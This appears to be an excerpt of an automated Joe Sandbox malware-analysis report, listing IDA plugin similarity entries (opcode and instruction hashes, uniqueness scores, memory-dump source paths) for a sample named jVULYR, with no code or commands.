                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_25_2_5790000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c6043d66bcca261f116d6980a0210d61cd39731bb4fb638bdeaea3d5cc3f9605
                                                  • Instruction ID: 25ec55c44c698602903fa1d0c9d38a98d6f8bf2a6c252599bfba5c0e583ab80c
                                                  • Opcode Fuzzy Hash: c6043d66bcca261f116d6980a0210d61cd39731bb4fb638bdeaea3d5cc3f9605
                                                  • Instruction Fuzzy Hash: 10219A71E002599FCB119FA9E840BEEBBB9FF88210F00442BE515E3241D6789A55CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000019.00000002.515883810.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_25_2_10fd000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba42586fe108d7709ad1863fbbc2413aba52469b4b07adaff3d52a3c2845cd8f
                                                  • Instruction ID: 29959e0b561b1a108a1e611152e7426f4621024eebd1e0c128fd5a44cb835c56
                                                  • Opcode Fuzzy Hash: ba42586fe108d7709ad1863fbbc2413aba52469b4b07adaff3d52a3c2845cd8f
                                                  • Instruction Fuzzy Hash: 8C11B176404280CFCF12CF54D9C4B16BFB1FB88724F2486ADD9450B616C33AD45ACBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000019.00000002.515883810.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_25_2_10fd000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba42586fe108d7709ad1863fbbc2413aba52469b4b07adaff3d52a3c2845cd8f
                                                  • Instruction ID: fee133ce7d81b09b13bd7b2cafa4ec9d2b60cd2d826b89419ccfbf7c11b74f5c
                                                  • Opcode Fuzzy Hash: ba42586fe108d7709ad1863fbbc2413aba52469b4b07adaff3d52a3c2845cd8f
                                                  • Instruction Fuzzy Hash: 1F11A276404280DFDB12CF54D5C4B56BFA1FB84324F24C6ADD9480B656C33AE456CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000019.00000002.523161847.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_25_2_5790000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d30ce807d54f0b0ca57b62cd66278a7ff41abb62cf39a818900700aa151877d2
                                                  • Instruction ID: 792d94c36b5f249e6103c6e64acf7efc223a4a0f74e48742f820909bb39f8b32
                                                  • Opcode Fuzzy Hash: d30ce807d54f0b0ca57b62cd66278a7ff41abb62cf39a818900700aa151877d2
                                                  • Instruction Fuzzy Hash: 3801AD727002058FCB19EF19E444A6A7BE7FFC8320B558029E54ADB360DE30EC119B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000019.00000002.523161847.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_25_2_5790000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e8c5a4765901e2490952524098de963bdf045d57468f6284e5fc734e65feb522
                                                  • Instruction ID: 59cf86b4463ecf90e80e20c5a9bbce7e4d724c90360421888655ba76bd401218
                                                  • Opcode Fuzzy Hash: e8c5a4765901e2490952524098de963bdf045d57468f6284e5fc734e65feb522
                                                  • Instruction Fuzzy Hash: 16E0E531A0C6091BCB54B779BC0096EB39A9FC1228B058525E615DB244FF30DD0047E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000019.00000002.523161847.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_25_2_5790000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d0811c8d06011dfb9898ffbdb0e5cd963e3f62f666a1d21e7e67828eaf95f486
                                                  • Instruction ID: 05aa2992e16a4f706965247c76b2ef76e424e4a3f997408b2b6e1d492e973cc7
                                                  • Opcode Fuzzy Hash: d0811c8d06011dfb9898ffbdb0e5cd963e3f62f666a1d21e7e67828eaf95f486
                                                  • Instruction Fuzzy Hash: 31D0673AB100089F8F059F98E8458EDF7B6FB9C225B058216FA15A7265C631A921DB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%